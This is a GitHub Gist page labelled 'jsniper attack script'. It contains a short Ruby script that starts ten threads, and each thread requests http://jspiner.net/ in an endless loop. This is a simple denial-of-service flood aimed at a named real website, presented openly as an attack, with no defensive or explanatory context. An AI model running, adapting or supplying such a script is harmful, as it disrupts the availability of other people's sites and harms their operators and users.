Created
          February 13, 2013 14:16 
        
      - 
      
- 
        Save pjc0247/4944908 to your computer and use it in GitHub Desktop. 
    jsniper attack script
  
        
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | require 'net/http' | |
| 10.times do | |
| Thread.new do | |
| while true | |
| uri = URI('http://jspiner.net/') | |
| Net::HTTP.get(uri) | |
| end | |
| end | |
| end | |
| while true | |
| end | 
  
    Sign up for free
    to join this conversation on GitHub.
    Already have an account?
    Sign in to comment